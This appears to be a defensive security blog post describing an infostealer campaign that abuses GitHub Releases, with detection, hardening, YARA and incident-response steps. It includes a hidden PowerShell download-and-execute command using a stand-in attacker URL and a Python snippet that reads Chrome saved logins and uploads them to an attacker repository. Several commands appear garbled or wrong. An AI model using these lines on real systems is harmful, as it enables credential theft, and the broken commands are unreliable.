Listen to this Post
Introduction:
Attackers are increasingly exploiting trusted cloud infrastructure to bypass security controls. A newly uncovered infostealer campaign abuses GitHub Releases—a legitimate feature for distributing software—to hide malicious payloads, while employing a PE-less Python implant that runs entirely in memory without writing traditional executable files to disk. This multi-stage obfuscation enables long-term covert access to targeted Windows systems, primarily focusing on Russian-speaking users through socially engineered phishing lures.
Learning Objectives:
- Understand the complete attack chain from phishing LNK files to PE-less Python execution and data exfiltration via GitHub Releases.
- Learn detection techniques for malicious LNK files, PowerShell abuse, and unauthorized GitHub API calls.
- Implement mitigation strategies including application whitelisting, PowerShell logging, and network traffic analysis to block similar infostealer campaigns.
You Should Know
1. Anatomy of the Phishing LNK+RAR Attack Vector
Attackers begin by distributing a password-protected RAR archive containing a malicious LNK (shortcut) file. The archive is themed as a Russian humanitarian aid request form to build contextual trust. When the victim double-clicks the LNK file, it executes a hidden PowerShell command that downloads and runs the Python implant without ever dropping a traditional .exe.
Step-by-step guide to analyze suspicious LNK files:
On Windows (using built-in tools):
Extract LNK target and command-line arguments
$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut("malicious.lnk")
Write-Host "Target: " $lnk.TargetPath
Write-Host "Arguments: " $lnk.Arguments
Write-Host "Working Directory: " $lnk.WorkingDirectory
On Linux (using `lnkinfo` from libbde-tools):
Install tools sudo apt install libbde-utils exiftool Analyze LNK structure lnkinfo malicious.lnk Extract embedded command strings malicious.lnk | grep -i "powershell|cmd|python"
What to look for: LNK files with unusually large command-line strings, references to PowerShell with -EncodedCommand, or mshta.exe/regsvr32.exe as targets.
2. PE-less Python Implant Execution & Persistence
The campaign uses a “PE-less” approach: the Python interpreter (already present on many Windows systems) is invoked via PowerShell to execute an in-memory script downloaded from GitHub Releases. No portable executable is written to disk, evading traditional file-based AV scans.
Command used to execute the implant:
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$c=(New-Object Net.WebClient).DownloadString('https://github.com/attacker/repo/releases/download/v1/payload.txt'); python -c $c}"
Persistence mechanisms (common methods abused):
Check registry run keys for suspicious entries reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run Check scheduled tasks schtasks /query /fo LIST /v | findstr /i "python|powershell" Check WMI event subscription (more advanced persistence) Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Detection: Monitor for `python.exe` spawning from non-standard parent processes (e.g., `powershell.exe` spawned by `explorer.exe` via LNK). Use Sysmon Event ID 1 (process creation) with custom rules.
3. Abusing GitHub Releases for Malware Payload Hosting
GitHub Releases provides authenticated, HTTPS-secured downloads with high uptime and reputation. The campaign uploads base64-encoded or encrypted Python payloads as release assets (e.g., v1/payload.txt). These files are downloaded via API or direct URL, blending with legitimate traffic.
How to detect GitHub Releases abuse in network logs:
Windows PowerShell detection:
Monitor for downloads from github.com/releases/download patterns in event logs
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=22} | Where-Object {$_.Message -match "github.com/./releases/download"}
Linux-based network monitoring with tcpdump:
Capture HTTPS traffic to GitHub (TLS SNI inspection) sudo tcpdump -i eth0 -s 0 -A 'tcp port 443 and host github.com' | grep -i "releases/download" Alternative: Use Zeek (formerly Bro) to log all HTTP requests echo 'header "User-Agent" ~ /python-requests|powershell/ and host contains "github.com"' >> /etc/zeek/site/local.bro
Mitigation: Organizations can block unauthenticated downloads from GitHub Releases via web filter, but risk breaking legitimate workflows. Instead, implement allowlisting of approved GitHub repositories.
4. Data Exfiltration & C2 Communication Patterns
After establishing the Python implant, the infostealer collects browser credentials, cryptocurrency wallets, and system information. Data is exfiltrated via the same GitHub Releases channel (using authenticated uploads with stolen tokens) or through alternative C2.
Simulated exfiltration Python snippet (for defensive testing):
import requests, json, os, base64
Collect browser profiles (example Chrome)
chrome_path = os.environ['USERPROFILE'] + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
with open(chrome_path, 'rb') as f:
data = base64.b64encode(f.read()).decode()
Exfiltrate via GitHub API (requires token)
url = "https://api.github.com/repos/attacker/repo/releases/123/assets"
headers = {"Authorization": "token ghp_FAKETOKEN", "Content-Type": "application/octet-stream"}
requests.post(url, headers=headers, data=data)
Detection of exfiltration:
- Monitor for unexpected outbound base64-encoded POST requests to
api.github.com. - Enable PowerShell Script Block Logging (Event ID 4104) to capture obfuscated commands.
- Use Sysmon Event ID 3 for network connections: filter for `Destination IP: 140.82.112.` (GitHub ranges) with
Image: python.exe.
5. Hardening Windows Against LNK & Script-Based Attacks
Prevent this campaign by configuring Windows security features:
Step 1: Disable LNK file execution from untrusted sources via Group Policy:
Set software restriction policies or AppLocker rule to block .lnk files in temp and download folders New-AppLockerPolicy -RuleType Path -Path "%USERPROFILE%\Downloads.lnk" -Action Deny -User Everyone
Step 2: Enable PowerShell logging and constrain language mode:
Enable deep script block logging Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1 Set PowerShell to ConstrainedLanguage mode for non-admin users $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
Step 3: Block Python execution from user-writable directories:
Use Windows Defender ASR rule to block Python from running in AppData Add-MpPreference -AttackSurfaceReductionRules_Ids "D4F940AB-401B-4EFC-AADC-AD5F3C50688A" -AttackSurfaceReductionRules_Actions Enabled
- Threat Hunting with YARA Rules for PE-less Payload
Security teams can hunt for the Python implant using YARA rules targeting memory artifacts and downloaded script patterns.
Example YARA rule:
rule GitHub_Infostealer_Python_Implant {
meta:
description = "Detects Python infostealer using GitHub Releases"
author = "Undercode"
date = "2026-05-10"
strings:
$s1 = "github.com" nocase
$s2 = "releases/download" nocase
$s3 = "requests.get" nocase
$s4 = "exec(" nocase
$s5 = "base64.b64decode" nocase
$s6 = "chromium" nocase
condition:
3 of ($s) and filesize < 200KB
}
To scan running Python processes on Windows:
Dump Python process memory and scan with YARA
Get-Process python -ErrorAction SilentlyContinue | ForEach-Object {
.\procdump.exe -accepteula -ma $<em>.Id $</em>.ProcessName
yara64.exe implant_rule.yara $_.ProcessName.dmp
}
7. Incident Response Steps for Compromised Systems
If an infostealer infection is suspected:
- Isolate the host from network (disable NIC or unplug cable).
2. Capture memory using `DumpIt` or `FTK Imager`.
3. Collect PowerShell logs:
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Export-Csv ps_scripts.csv
4. Review GitHub API access in firewall logs and Windows `EventID 3` (Sysmon).
5. Extract and reverse the Python implant from memory strings:
On Linux analysis VM strings victim_memory.dmp | grep -A 50 "def main"
6. Reset all credentials stored on the machine and revoke any OAuth tokens found in memory.
What Undercode Say:
- Trusted platforms are the new battleground: Attackers abuse GitHub Releases not because of a vulnerability, but because of inherent trust—security teams must monitor outbound traffic to legitimate services with the same scrutiny as unknown domains.
- PE-less malware requires behavioral detection: Traditional file-based AV is blind to Python scripts executed entirely in memory. Organizations must invest in EDR solutions that hook into PowerShell, Python, and WMI to detect malicious parent-child process relationships and anomalous network connections.
This campaign demonstrates a maturing threat actor refining delivery techniques (from RAR+LNK to survey lures) to improve click-through rates. The use of Russian humanitarian themes indicates focused geopolitical targeting. Defenders should prioritize PowerShell Script Block Logging, implement AppLocker to restrict Python execution to authorized directories, and treat all GitHub Releases downloads as potentially suspicious until verified. The shift toward living-off-the-land and cloud‑abuse tactics means visibility into script interpreters and API calls is no longer optional—it’s essential for survival.
Prediction:
As GitHub and similar platforms (GitLab, AWS S3, Azure Blob) continue to be abused, we will see the emergence of “reputation-based detection” models that analyze download frequency, username-behavior anomalies, and file entropy on trusted domains. Within 12 months, threat actors will begin using AI-generated phishing content tailored to specific GitHub repository topics (e.g., fake security updates from popular projects), further lowering victim suspicion. Organizations that fail to implement strict outbound TLS inspection for developer platforms will remain vulnerable to these supply-chain‑adjacent attacks.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Cybersecuritynews Gbhackers – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
